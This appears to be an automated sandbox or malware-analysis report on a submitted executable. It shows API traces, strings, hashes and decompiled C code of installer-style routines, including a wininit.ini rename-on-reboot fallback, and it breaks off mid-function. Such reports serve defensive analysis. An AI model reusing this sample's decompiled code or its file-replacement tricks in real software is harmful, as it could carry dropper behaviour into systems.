0x004036c6
0x004036cc
0x004036da
0x00403804
0x00403804
0x00000000
0x00403804
0x004036e0
0x004036e9
0x00403728
0x00000000
0x00403728
0x004035e3
0x004035e3
0x004035e8
0x00000000
0x00000000
0x004035f2
0x00403601
0x00403606
0x0040360d
0x00000000
0x00000000
0x00403611
0x00403613
0x00403620
0x00403620
0x00403628
0x0040362e
0x00403656
0x0040365e
0x00000000
0x00403640
0x00403641
0x0040364a
0x00403650
0x00403651
0x00000000
0x00403651
0x0040364c
0x0040364e
0x00000000
0x00000000
0x00000000
0x0040364e
0x0040362e

APIs

Part of subcall function 00405CEE: GetModuleHandleA.KERNEL32(000000F1,00405736,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054D8,?,00000000,000000F1,?), ref: 00405CF2
Part of subcall function 00405CEE: LoadLibraryA.KERNEL32(000000F1,?,?,004054D8,?,00000000,000000F1,?), ref: 00405D00
Part of subcall function 00405CEE: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405D0F

lstrcatA.KERNEL32(1033,0042A8A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8A0,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\eQLPRPErea.exe" ,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 004035B9
lstrlenA.KERNEL32(YVfgfgfgfgfg,?,?,?,YVfgfgfgfgfg,C:\Users\user\AppData\Local\Temp,1033,0042A8A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8A0,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\eQLPRPErea.exe" ,00000000), ref: 00403623
lstrcmpiA.KERNEL32(?,.exe,YVfgfgfgfgfg,?,?,?,YVfgfgfgfgfg,C:\Users\user\AppData\Local\Temp,1033,0042A8A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8A0,KERNEL32.dll,GetUserDefaultUILanguage), ref: 00403636
GetFileAttributesA.KERNEL32(YVfgfgfgfgfg), ref: 00403641
LoadImageA.USER32 ref: 0040368A
RegisterClassA.USER32 ref: 004036D1

Part of subcall function 00405939: wsprintfA.USER32 ref: 00405946

SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036E9
CreateWindowExA.USER32 ref: 00403722
ShowWindow.USER32(00000005,00000000), ref: 00403758
LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040376A
LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040377A
GetClassInfoA.USER32 ref: 0040378A
GetClassInfoA.USER32 ref: 00403799
RegisterClassA.USER32 ref: 004037A9
DialogBoxParamA.USER32 ref: 004037C8

Strings

RichEd20.dll, xrefs: 00403764, 00403769, 00403770
.DEFAULT\Control Panel\International, xrefs: 004035A4
1033, xrefs: 0040356A, 004035B4
.exe, xrefs: 00403630
RichEdit20A, xrefs: 00403782, 00403788, 00403791
Locale, xrefs: 0040359F
GetUserDefaultUILanguage, xrefs: 0040354F
YVfgfgfgfgfg, xrefs: 004035F2, 004035F9, 00403606, 00403650, 00403656
KERNEL32.dll, xrefs: 00403554
C:\Users\user\AppData\Local\Temp\, xrefs: 00403545
C:\Users\user\AppData\Local\Temp, xrefs: 004035C8, 004035D0, 0040365D, 00403663, 00403673
"C:\Users\user\Desktop\eQLPRPErea.exe" , xrefs: 0040354E
Control Panel\Desktop\ResourceLocale, xrefs: 00403587
_Nb, xrefs: 004036E0, 004036E5

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\eQLPRPErea.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$YVfgfgfgfgfg$_Nb
API String ID: 914957316-3748740015
Opcode ID: d176114afbd04041798e0cb44c6bd170754ede8e8114513eb1934af700cf44d0
Instruction ID: 60d3dd17ab41db2a81a331a2e75007f0283db07517ec3cfb703c1e7772151899
Opcode Fuzzy Hash: d176114afbd04041798e0cb44c6bd170754ede8e8114513eb1934af700cf44d0
Instruction Fuzzy Hash: C161D5B1604200BFD720BF669C45E273EACEB44759F80457FF941B22E2D778A9058A7E

Uniqueness

Uniqueness Score: -1.00%

Function 00403F0B, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403F0B(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42a888 =  *0x42a888 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E2A(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3c0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f424, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f424, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42a888 != 0) {
						goto L25;
					} else {
						_t112 =  *0x42a078 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403DE5(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404196();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42ebfc; // 0x583a6d
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f458;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403ED7;
				E00403DC3(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403DC3(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403DE5( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403DF8(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42f428 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x42986c =  *0x42986c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42a888 =  *0x42a888 & 0x00000000;
				return 0;
			}

0x00403f1b
0x00404041
0x0040409d
0x004040a1
0x00404178
0x0040417a
0x0040417a
0x00404180
0x00404180
0x00404183
0x00000000
0x0040418a
0x004040af
0x004040b1
0x004040bb
0x004040c6
0x004040c9
0x004040cc
0x004040d7
0x004040da
0x004040e1
0x004040ef
0x00404107
0x0040411a
0x0040412a
0x0040412c
0x0040412c
0x004040e1
0x00404136
0x00000000
0x00404141
0x00404145
0x00404156
0x00404156
0x0040415c
0x0040416a
0x0040416a
0x00000000
0x0040416e
0x00404136
0x0040404c
0x00000000
0x00404060
0x00404066
0x0040406c
0x00000000
0x00000000
0x00404091
0x00404093
0x00404098
0x00000000
0x00404098
0x0040404c
0x00403f21
0x00403f24
0x00403f29
0x00403f2b
0x00403f3a
0x00403f3a
0x00403f41
0x00403f44
0x00403f46
0x00403f4b
0x00403f54
0x00403f5a
0x00403f66
0x00403f69
0x00403f72
0x00403f77
0x00403f7a
0x00403f7f
0x00403f96
0x00403f9d
0x00403fb0
0x00403fb3
0x00403fc8
0x00403fcf
0x00403fd4
0x00403fd9
0x00403fd9
0x00403fe8
0x00403ff7
0x00403ff9
0x0040400f
0x0040401e
0x00404020
0x00000000

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F96
GetDlgItem.USER32 ref: 00403FAA
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FC8
GetSysColor.USER32(?), ref: 00403FD9
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FE8
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FF7
lstrlenA.KERNEL32(?), ref: 00404001
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040400F
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040401E
GetDlgItem.USER32 ref: 00404081
SendMessageA.USER32(00000000), ref: 00404084
GetDlgItem.USER32 ref: 004040AF
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040EF
LoadCursorA.USER32 ref: 004040FE
SetCursor.USER32(00000000), ref: 00404107
ShellExecuteA.SHELL32(0000070B,open,0042E3C0,00000000,00000000,00000001), ref: 0040411A
LoadCursorA.USER32 ref: 00404127
SetCursor.USER32(00000000), ref: 0040412A
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404156
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040416A

Strings

N, xrefs: 0040409D
open, xrefs: 00404112
m:X, xrefs: 00403F2B
YVfgfgfgfgfg, xrefs: 004040DA

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$YVfgfgfgfgfg$m:X$open
API String ID: 3615053054-3285269670
Opcode ID: 0e461305457e209acf086288c6f298716e5b31ce5db75a0c6c55c4075ebce297
Instruction ID: 74e3a25a4ac884a07ee3b1bf84c617da9f937bcc22f9c720612e6a340156d24e
Opcode Fuzzy Hash: 0e461305457e209acf086288c6f298716e5b31ce5db75a0c6c55c4075ebce297
Instruction Fuzzy Hash: 8761B571A40209BFDB10AF60DD45F6A3BA9EB54715F10403AFB017A2D1C7B8A951CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00405723, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 151
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00405723(long _a4, long _a16) {
				CHAR* _v0;
				intOrPtr* _t13;
				long _t14;
				int _t19;
				void* _t27;
				long _t28;
				intOrPtr* _t36;
				int _t42;
				intOrPtr* _t43;
				long _t48;
				CHAR* _t50;
				void* _t52;
				void* _t54;

				_t13 = E00405CEE("KERNEL32.dll", "MoveFileExA");
				_t50 = _v0;
				if(_t13 != 0) {
					_t19 =  *_t13(_a4, _t50, 5);
					if(_t19 != 0) {
						L16:
						 *0x42f4b0 =  *0x42f4b0 + 1;
						return _t19;
					}
				}
				 *0x42ca30 = 0x4c554e;
				if(_t50 == 0) {
					L5:
					_t14 = GetShortPathNameA(_a4, 0x42c4a8, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						_t42 = wsprintfA(0x42c0a8, "%s=%s\r\n", 0x42ca30, 0x42c4a8);
						GetWindowsDirectoryA(0x42c4a8, 0x3f0);
						lstrcatA(0x42c4a8, "\\wininit.ini");
						_t19 = CreateFileA(0x42c4a8, 0xc0000000, 0, 0, 4, 0x8000080, 0);
						_t54 = _t19;
						if(_t54 == 0xffffffff) {
							goto L16;
						}
						_t48 = GetFileSize(_t54, 0);
						_t5 = _t42 + 0xa; // 0xa
						_t52 = GlobalAlloc(0x40, _t48 + _t5);
						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) {
							L15:
							_t19 = CloseHandle(_t54);
							goto L16;
						} else {
							if(E00405640(_t52, "[Rename]\r\n") != 0) {
								_t27 = E00405640(_t25 + 0xa, "\n[");
								if(_t27 == 0) {
									L13:
									_t28 = _t48;
									L14:
									E0040568C(_t52 + _t28, 0x42c0a8, _t42);
									SetFilePointer(_t54, 0, 0, 0);
									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0);
									GlobalFree(_t52);
									goto L15;
								}
								_t36 = _t27 + 1;
								_t43 = _t36;
								if(_t36 >= _t52 + _t48) {
									L21:
									_t28 = _t36 - _t52;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t42)) =  *_t43;
									_t43 = _t43 + 1;
								} while (_t43 < _t52 + _t48);
								goto L21;
							}
							E004059DB(_t52 + _t48, "[Rename]\r\n");
							_t48 = _t48 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004056AC(_t50, 0, 1));
					_t14 = GetShortPathNameA(_t50, 0x42ca30, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						goto L5;
					}
				}
				return _t14;
			}

0x00405731
0x00405738
0x0040573c
0x00405745
0x00405749
0x00405895
0x00405895
0x00000000
0x00405895
0x00405749
0x00405755
0x0040576b
0x00405793
0x0040579e
0x004057a2
0x004057c5
0x004057cd
0x004057d9
0x004057f0
0x004057f6
0x004057fb
0x00000000
0x00000000
0x0040580a
0x0040580c
0x00405819
0x0040581d
0x0040588e
0x0040588f
0x00000000
0x00405839
0x00405846
0x004058ab
0x004058b2
0x00405859
0x00405859
0x0040585b
0x00405864
0x0040586f
0x00405881
0x00405888
0x00000000
0x00405888
0x004058b4
0x004058ba
0x004058bc
0x004058cb
0x004058cb
0x00000000
0x00000000
0x00000000
0x00000000
0x004058be
0x004058be
0x004058c0
0x004058c3
0x004058c7
0x00000000
0x004058be
0x00405851
0x00405856
0x00000000
0x00405856
0x0040581d
0x0040576d
0x00405778
0x00405781
0x00405785
0x00000000
0x00000000
0x00405785
0x0040589f

APIs

Part of subcall function 00405CEE: GetModuleHandleA.KERNEL32(000000F1,00405736,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054D8,?,00000000,000000F1,?), ref: 00405CF2
Part of subcall function 00405CEE: LoadLibraryA.KERNEL32(000000F1,?,?,004054D8,?,00000000,000000F1,?), ref: 00405D00
Part of subcall function 00405CEE: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405D0F

CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054D8,?,00000000,000000F1,?), ref: 00405778
GetShortPathNameA.KERNEL32(?,0042CA30,00000400), ref: 00405781
GetShortPathNameA.KERNEL32(00000000,0042C4A8,00000400), ref: 0040579E
wsprintfA.USER32 ref: 004057BC
GetWindowsDirectoryA.KERNEL32(0042C4A8,000003F0,?,?,00000000,000000F1,?), ref: 004057CD
lstrcatA.KERNEL32(0042C4A8,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D9
CreateFileA.KERNEL32(0042C4A8,C0000000,00000000,00000000,00000004,08000080,00000000,0042C4A8,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057F0
GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 00405804
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405813
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405829
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042C0A8,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040586F
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405881
GlobalFree.KERNEL32 ref: 00405888
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040588F

Part of subcall function 00405640: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405844,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405647
Part of subcall function 00405640: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405844,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405677

Strings

[Rename], xrefs: 00405839, 0040584B
KERNEL32.dll, xrefs: 0040572C
MoveFileExA, xrefs: 00405727
%s=%s, xrefs: 004057B2
\wininit.ini, xrefs: 004057D3

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
API String ID: 3633819597-1342836890
Opcode ID: 36c133e8bbafd4ff63adde3db96e128c05ba176af3752b4c43bc51613ef0b32f
Instruction ID: a1a0e0f9ef0cd972c6a82fac1fe668e7cfe11d0cfdfeabcff745320237112b5d
Opcode Fuzzy Hash: 36c133e8bbafd4ff63adde3db96e128c05ba176af3752b4c43bc51613ef0b32f
Instruction Fuzzy Hash: C0411372640B11BBE2203B219C89F6B3A5CDF85755F144536FE05F62D2EA38AC018EBD

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f428;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "arability Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f424;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,arability Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C
arability Setup, xrefs: 00401150

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$arability Setup
API String ID: 941294808-1935799845
Opcode ID: 912aa521ca95eb435e7b4df28ced32df10b76a863633605e6027fd9c7ce49bbb
Instruction ID: dcdf37c0a61dcd20993090bd1158cb83bc568099e5e3d0b1b0767e43f48950cc
Opcode Fuzzy Hash: 912aa521ca95eb435e7b4df28ced32df10b76a863633605e6027fd9c7ce49bbb
Instruction Fuzzy Hash: 2C41AA71804249AFCB058FA5CD459BFBFB9FF44324F00802AF951AA1A0C778EA54DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004059FD, Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 180
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004059FD(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				CHAR* _t35;
				signed int _t37;
				signed int _t38;
				signed int _t49;
				char _t51;
				signed int _t61;
				char* _t62;
				char _t67;
				signed int _t69;
				intOrPtr _t71;
				CHAR* _t79;
				signed int _t86;
				signed int _t88;
				void* _t89;

				_t61 = _a8;
				if(_t61 < 0) {
					_t71 =  *0x42ebfc; // 0x583a6d
					_t61 =  *(_t71 - 4 + _t61 * 4);
				}
				_t62 = _t61 +  *0x42f458;
				_t35 = 0x42e3c0;
				_t79 = 0x42e3c0;
				if(_a4 - 0x42e3c0 < 0x800) {
					_t79 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t67 =  *_t62;
					_a11 = _t67;
					if(_t67 == 0) {
						break;
					}
					__eflags = _t79 - _t35 - 0x400;
					if(_t79 - _t35 >= 0x400) {
						break;
					}
					_t62 = _t62 + 1;
					__eflags = _t67 - 0xfc;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t79 = _t67;
							_t79 =  &(_t79[1]);
							__eflags = _t79;
						} else {
							 *_t79 =  *_t62;
							_t79 =  &(_t79[1]);
							_t62 = _t62 + 1;
						}
						continue;
					}
					_t37 =  *((char*)(_t62 + 1));
					_t69 =  *_t62;
					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
					_v28 = _t69;
					_v20 = _t37;
					_t70 = _t69 | 0x00008000;
					_t38 = _t37 | 0x00008000;
					_v24 = _t69 | 0x00008000;
					_t62 = _t62 + 2;
					__eflags = _a11 - 0xfe;
					_v16 = _t38;
					if(_a11 != 0xfe) {
						__eflags = _a11 - 0xfd;
						if(_a11 != 0xfd) {
							__eflags = _a11 - 0xff;
							if(_a11 == 0xff) {
								__eflags = (_t38 | 0xffffffff) - _t86;
								E004059FD(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
							}
							L38:
							_t79 =  &(_t79[lstrlenA(_t79)]);
							_t35 = 0x42e3c0;
							continue;
						}
						__eflags = _t86 - 0x1b;
						if(_t86 != 0x1b) {
							__eflags = (_t86 << 0xa) + 0x430000;
							E004059DB(_t79, (_t86 << 0xa) + 0x430000);
						} else {
							E00405939(_t79,  *0x42f424);
						}
						__eflags = _t86 + 0xffffffeb - 6;
						if(_t86 + 0xffffffeb < 6) {
							L29:
							E00405C17(_t79);
						}
						goto L38;
					}
					_a8 = _a8 & 0x00000000;
					 *_t79 =  *_t79 & 0x00000000;
					_t88 = 4;
					__eflags = _v20 - _t88;
					if(_v20 != _t88) {
						_t49 = _v28;
						__eflags = _t49 - 0x2b;
						if(_t49 != 0x2b) {
							__eflags = _t49 - 0x26;
							if(_t49 != 0x26) {
								__eflags = _t49 - 0x25;
								if(_t49 != 0x25) {
									__eflags = _t49 - 0x24;
									if(_t49 != 0x24) {
										goto L19;
									}
									GetWindowsDirectoryA(_t79, 0x400);
									goto L18;
								}
								GetSystemDirectoryA(_t79, 0x400);
								goto L18;
							}
							E004058CF(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							E004059DB(_t79, "C:\\Program Files");
							goto L18;
						} else {
							E004058CF(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
							L18:
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							goto L19;
						}
					} else {
						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
						L19:
						__eflags =  *0x42f4a4;
						if( *0x42f4a4 == 0) {
							_t88 = 2;
						}
						do {
							_t88 = _t88 - 1;
							_t51 = SHGetSpecialFolderLocation( *0x42f424,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
							__eflags = _t51;
							if(_t51 != 0) {
								 *_t79 =  *_t79 & 0x00000000;
								__eflags =  *_t79;
								goto L25;
							}
							__imp__SHGetPathFromIDListA(_v8, _t79);
							_v12 = _t51;
							E00405238(_t70, _v8);
							__eflags = _v12;
							if(_v12 != 0) {
								break;
							}
							L25:
							__eflags = _t88;
